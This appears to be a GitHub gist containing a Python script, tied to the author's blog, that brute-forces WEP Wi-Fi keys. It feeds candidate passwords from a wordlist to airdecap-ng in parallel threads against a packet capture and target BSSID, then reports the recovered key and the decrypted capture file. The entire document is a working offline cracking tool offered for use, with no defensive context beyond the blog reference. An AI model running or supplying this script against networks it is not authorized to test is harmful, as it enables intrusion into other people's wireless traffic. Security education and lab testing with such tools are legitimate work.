Skip to content

Instantly share code, notes, and snippets.

@tbhaxor
Last active February 18, 2024 20:03
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tbhaxor/170894df0d43fd23eae49b0b20442c27 to your computer and use it in GitHub Desktop.
Save tbhaxor/170894df0d43fd23eae49b0b20442c27 to your computer and use it in GitHub Desktop.
Decrypt and bruteforce script for tbhaxor blog
import re
import sys
import subprocess
import os
import uuid
from binascii import hexlify
from concurrent.futures import ThreadPoolExecutor
# check the required parameters in the argv list
if len(sys.argv) < 4:
print("usage: %s <password file> <capture file> <bssid>" % sys.argv[0], file=sys.stderr)
sys.exit(1)
def do_crack(ascii: bytes, key: bytes, pool: ThreadPoolExecutor):
sys.stdout.write("\033[K")
print("[!] Trying key", ascii.decode(), end="\r")
# generate output file name
outfile = uuid.uuid1().hex + ".cap"
# call the airdecap with key, bssid, output file and capture file (params in order)
output = subprocess.check_output(["/usr/bin/airdecap-ng",
"-w", key,
"-b", sys.argv[3],
"-o", outfile,
sys.argv[2]],
stderr=subprocess.DEVNULL)
# transform the output in the list
output_decoded = output.decode()
output_list = output_decoded.strip().split("\n")
# iterate list to check for "decrypted WEP" string in it
for entry in output_list:
if entry.count("decrypted WEP") > 0:
# check the last word, if it is not equal to 0, thefore key crack is successful
# print the key and the decrypted file name
# shutdown the thread pool and cancel futures
# exit the main process with exit code 0
words = entry.split(" ")
if int(words[-1]) != 0:
sys.stdout.write("\033[K")
print("\r[!] Found: ", ascii.decode())
print("[!] Decrypted file: ", outfile)
pool.shutdown(wait=False, cancel_futures=True)
sys.exit(0)
else:
# unlink the file failed to decrypt
os.unlink(outfile)
pass
# handle RuntimeError error for unexpected pool shutdown
# handle all other errors in second expect block
try:
# create the thread pool executor with max 5 workers (you can increase it too)
# open the file in read-binary format from first argument
with ThreadPoolExecutor(max_workers=5) as pool, open(sys.argv[1], "rb") as file:
for line in file:
# remove the whitespaces like \r or \n or both
line = line.strip()
# if the key is 40 bits or 104 bits submit to do_crack function after
# converting the binary string to hex like "echo key | xxd -ps"
if len(line) == 5 or len(line) == 13:
key = hexlify(line)
pool.submit(do_crack, line, key, pool)
except RuntimeError:
sys.exit(0)
except Exception as e:
print("Unexpected failure: %s" % e)
sys.exit(1)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment